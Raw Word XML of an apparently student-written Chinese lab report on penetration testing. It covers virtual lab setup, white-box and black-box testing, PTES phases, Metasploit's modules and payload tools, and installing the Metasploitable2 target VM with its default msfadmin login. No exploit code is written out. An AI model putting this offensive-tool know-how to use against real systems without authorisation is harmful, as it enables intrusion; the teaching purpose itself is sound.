        <w:t>、实验总结及心得体会</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虚拟环境</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当我们谈到道德黑客的时候，最好最安全的方法就是在虚拟环境下练习。可以使用虚拟机创建虚拟环境。虚拟机是运行在物理机上的虚假机器。在虚拟世界中，物理机上运行的真实的操作系统称为“host”，虚拟机上运行的操作系统称为“guest”。如果guest被攻破，host仍然是安全的，所以说虚拟机是安全的。</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常用的虚拟系统有VMware Workstation、VMware Workstation Player、Oracle VirtualBox等。在这个实验室中，我们将使用VMware workstations。VMware Workstation和VMware Workstation Player二者之间的不同之处是，Workstation可以创建和运行虚拟机，而Player只能用于运行虚拟机。</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渗透测试并没有一个标准的定义。国外一些安全组织达成共识的通用说法是，渗透测试是通过模拟恶意黑客的攻击方法，来评估计算机网络系统安全的一种评估方法。这个过程包括对系统的任何弱点、技术缺陷或漏洞的主动分析。这个分析是从一个攻击者可能存在的位置来进行的，并且从这个位置有条件主动利用安全漏洞。</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渗透测试与其它评估方法不同。通常的评估方法是根据已知信息资源或其它被评估对象，去发现所有相关的安全问题。渗透测试是根据已知可利用的安全漏洞，去发现是否存在相应的信息资源。相比较而言，通常评估方法对评估结果更具有全面性，而渗透测试更注重安全漏洞的严重性。选自KaliLinux无线网络渗透测试教程</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1.白盒测试</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使用白盒测试，需要和客户组织一起工作，来识别出潜在的安全风险，客户组织将会向用户展示它们的系统与网络环境。白盒测试最大的好处就是攻击者将拥有所有的内部知识，并可以在不需要害怕被阻断的情况下任意地实施攻击。而白盒测试的最大问题在于无法有效地测试客户组织的应急响应程序，也无法判断出它们的安全防护计划对检测特定攻击的效率。如果时间有限，或是特定的渗透测试环节（如信息收集并不在范围之内的话），那么白盒测试是最好的渗透测试方法。选自KaliLinux无线网络渗透测试教程</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2.黑盒测试</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黑盒测试与白盒测试不同的是，经过授权的黑盒测试是设计为模拟攻击者的入侵行为，并在不了解客户组织大部分信息和知识的情况下实施的。黑盒测试可以用来测试内部安全团队检测和应对一次攻击的能力。黑盒测试是比较费时费力的，同时需要渗透测试者具备更强的技术能力。它依靠攻击者的能力通过探测获取目标系统的系统。因此，作为一次黑盒测试的渗透测试者，通常并不需要找出目标系统的所有安全漏洞，而只需要尝试找出并利用可以获取目标系统访问权代价最小的攻击路径，并保证不被检测到。选自KaliLinux无线网络渗透测试教程</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不论测试方法是否相同，渗透测试通常具有两个显著特点。</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q  渗透测试是一个渐进的并且逐步深入的过程。</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q  渗透测试是选择不影响业务系统正常运行的攻击方法进行的测试。</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注意：在渗透测试之前，需要考虑一些需求，如法律边界、时间限制和约束条件等。所以，在渗透测试时首先要获得客户的许可。如果不这样做的话，将可能导致法律诉讼的问题。因此，一定要进行正确的判断。</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渗透测试环境搭建是进行渗透测试的基础工作。以下是一些渗透测试环境搭建实践总结：</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选择合适的虚拟化软件</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在搭建渗透测试环境时，通常需要使用虚拟化软件来创建虚拟机。选择合适的虚拟化软件非常重要，建议选择开源软件VirtualBox或VMware。</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下载合适的操作系统镜像</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在搭建渗透测试环境时，需要下载合适的操作系统镜像。常用的渗透测试操作系统包括Kali Linux、Parrot Security、BlackArch等。</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设置虚拟机网络</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在虚拟机中进行渗透测试需要设置虚拟机网络。建议使用桥接模式，这样虚拟机可以直接访问物理网络，方便进行渗透测试。</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安装必要的渗透测试工具</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在搭建渗透测试环境时，需要安装必要的渗透测试工具，例如nmap、Metasploit、Burp Suite、sqlmap等。</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练习渗透测试实践</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搭建好渗透测试环境后，需要进行实践练习。可以从简单的漏洞扫描开始，逐渐提高难度，进行漏洞利用、网络攻击等实践。</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学习常见漏洞利用方法</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在渗透测试实践中，学习常见的漏洞利用方法非常重要。例如，学习缓冲区溢出攻击、SQL注入攻击、XSS攻击等。</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r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4D4D4D"/>
          <w:spacing w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>总之，渗透测试环境搭建是进行渗透测试的基础工作。只有掌握好渗透测试环境搭建的技巧和方法，才能更好地进行实践，提高渗透测试技能。</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4D4D4D"/>
          <w:spacing w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>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pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1" w:right="-512" w:rightChars="-244"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>实验</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>二：Metasploit渗透测试实践</w:t>
      </w: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1、实验目的和要求</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了解Metasploit框架的概念、组成，掌握Metasploit框架的基本使用，能</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>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val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>够利用Metasploit对已知漏洞进行渗透攻击。</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模拟灰盒测试对自己搭建的靶机进行渗透，发现其脆弱性，描述脆弱性的可利用手段</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</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在渗透过程中逐渐掌握科学的渗透测试方法，即PTES标准渗透测试方法的七个阶段：（1）前期交互阶段（跳过）；（2）情报搜集阶段；（3）威胁建模阶段；（4）漏洞分析阶段；（5）渗透攻击阶段；（6）后渗透攻击阶段；（7）报告阶段。</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积极学习《网络安全法》，在渗透测试过程中逐渐清晰所要求掌握的渗透</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>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hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>技能，有法律意识和道德素养，有针对有目的进行渗透测试。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:pageBreakBefore w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>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sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>重点：PTES标准渗透测试方法。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:pageBreakBefore w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>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kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>难点：渗透测试靶机环境的搭建。</w:t>
      </w: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2、实验准备工作</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:right="-512" w:rightChars="-244"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1.Metasploit 渗透测试框架介绍</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="both"/>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083935" cy="3439795"/>
            <wp:effectExtent l="0" t="0" r="12065" b="1460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8"/>
                    <a:srcRect r="71" b="4933"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6083935" cy="3439795"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:right="-512" w:rightChars="-244"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pP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1、基础库：metasploit 基础库文件位于源码根目录路径下的 libraries 目录中，包括Rex,framework-core 和 framework-base 三部分。</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Rex 是整个框架所依赖的最基础的一些组件，如包装的网络套接字、网络应用协议客户端与服务端实现、日志子系统、渗透攻击支持例程、PostgreSQL 以及 MySQL 数据库支持等；</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framework-core 库负责实现所有与各种类型的上层模块及插件的交互接口；</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framework-base 库扩展了 framework-core，提供更加简单的包装例程，并为处理框架各个方面的功能提供了一些功能类，用于支持用户接口与功能程序调用框架本身功能及框架集成模块；</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2、模块：模块组织按照不同的用途分为 6 种类型的模块（Modules）：</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分为辅助模块（Aux)、渗透攻击模块（Exploits)、后渗透攻击模块（Post)、攻击载荷模块</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（payloads)、编码器模块（Encoders)、空指令模块（Nops)。</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注：payload 又称为攻击载荷，主要是用来建立目标机与攻击机稳定连接的，可返回 shell，也可以进行程序注入等</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3、插件：插件能够扩充框架的功能，或者组装已有功能构成高级特性的组件。插件可以集成现有的一些外部安全工具，如 Nessus、OpenVAS 漏洞扫描器等，为用户接口提供一些新的功能。</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4、接口：包括 msfconsole 控制终端、msfcli 命令行、msfgui 图形化界面、armitage 图形化界面以及 msfapi 远程调用接口。</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5、功能程序： metasploit 还提供了一系列可直接运行的功能程序，支持渗透测试者与安全人员快速地利用 metasploit 框架内部能力完成一些特定任务。比如 msfpayload、msfencode 和msfvenom 可以将攻击载荷封装为可执行文件、C 语言、JavaScript 语言等多种形式，并可以进行各种类型的编码。</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Metasploit目录结构</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进入到Metasploit所在目录</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="both"/>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867400" cy="771525"/>
            <wp:effectExtent l="0" t="0" r="0" b="1587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9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5867400" cy="771525"/>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311900" cy="734695"/>
            <wp:effectExtent l="0" t="0" r="12700" b="190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20"/>
                    <a:srcRect r="-242" b="16583"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6311900" cy="734695"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">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lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>data：Metasploit 使用的可编辑文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>documentation：为框架提供文档</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>lib：框架代码库</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>modules：实际的 MSF 模块</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>plugins：可以在运行时加载的插件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>scripts：Meterpreter 和其他脚本</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>tools：各种有用的命令行工具</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2.Metasploitable2-Linux 靶机系统介绍</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Metasploitable2 安装</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直接解压压缩包：metasploitable-linux-2.0.0.zip ，我压缩到了：</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E:\workstation\metasploitable-linux-2.0.0 。大家选择自己的目录就可以了。</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使用 VMware 打开新的虚拟机 然后就正常的步骤安装即可</w:t>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rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>开启虚拟机</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019040" cy="3409315"/>
            <wp:effectExtent l="0" t="0" r="10160" b="1968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21"/>
                    <a:srcRect r="416" b="5807"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5019040" cy="3409315"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">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使用普通用户：msfadmin 密码： msfadmin 进行登录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>修改 root 用户密码（输入密码的时候是不显示的）</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154295" cy="3464560"/>
            <wp:effectExtent l="0" t="0" r="1905" b="1524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2"/>
                    <a:srcRect r="393" b="6767"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5154295" cy="3464560"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">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先输入的是msfadmin，后两次分别是密码和确认密码</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963285" cy="3994785"/>
            <wp:effectExtent l="0" t="0" r="5715" b="1841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3"/>
                    <a:srcRect r="-53" b="6676"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5963285" cy="399478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切换到root用户</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371590" cy="4298950"/>
            <wp:effectExtent l="0" t="0" r="3810" b="1905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4"/>
                    <a:srcRect r="119" b="6168"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6371590" cy="42989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下面配置靶机的ip地址以及网关子网掩码等</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>目录是/etc/network/interfaces</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977130" cy="3410585"/>
            <wp:effectExtent l="0" t="0" r="1270" b="1841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5"/>
                    <a:srcRect r="518" b="5084"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4977130" cy="341058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address是ip地址，这里我们设定的ip地址要跟kali在同一个网段，不然没办法通信，netmask子网掩码，gateway网关</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>设置完成后esc 然后shift+z+z快速保存退出的快捷键</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>重启下网络</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="both"/>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857875" cy="485775"/>
            <wp:effectExtent l="0" t="0" r="9525" b="2222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6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5857875" cy="4857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看一眼当前的ip地址</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951855" cy="1485900"/>
            <wp:effectExtent l="0" t="0" r="17145" b="1270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7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5951855" cy="14859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eastAsia="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz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这个时候我们最好能做一个快照，以便后续对操作系统造成破坏</w:t>
      </w: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3、实验内容及步骤</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黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>3.1Metasploit 基本使用方法</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Metasploit 程序需要使用 Postgresql 数据库。</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Postgresql 概述：</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PostgreSQL 是一种特性非常齐全的自由软件的对象-关系型数据库管理系统（ORDBMS），是以加州大学计算机系开发的 POSTGRES 4.2 版本为基础的对象关系型数据库管理系统。</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官网：https://www.postgresql.org/</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725035" cy="3026410"/>
            <wp:effectExtent l="0" t="0" r="24765" b="2159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8"/>
                    <a:srcRect r="97" b="2900"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4725035" cy="30264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PostgreSQL 和 MySQL 数据的应用场景区别：</w:t>
      </w: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br w:type="textWrapping"/>
      </w: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从应用场景来说，PostgreSQL 更加适合严格的企业应用场景（比如金融、电信、ERP、CRM），而MySQL 更加适合业务逻辑相对简单、数据可靠性要求较低的互联网场景</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手动启动数据库并且设置成开机自启动</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070600" cy="1574165"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>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9"/>
                    <a:srcRect r="489" b="13291"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6070600" cy="157416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启动metasploit</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170930" cy="4104005"/>
            <wp:effectExtent l="0" t="0" r="1270" b="1079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30"/>
                    <a:srcRect r="185" b="4351"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6170930" cy="410400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启动完成后会有一些统计信息，比如说版本号，有多少个 exploits，多少个 payloads 等</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4D4D4D"/>
          <w:spacing w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w: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t>help帮助手册</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768975" cy="3952875"/>
            <wp:effectExtent l="0" t="0" r="22225"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31"/>
                    <a:srcRect r="44" b="5063"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5768975" cy="3952875"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
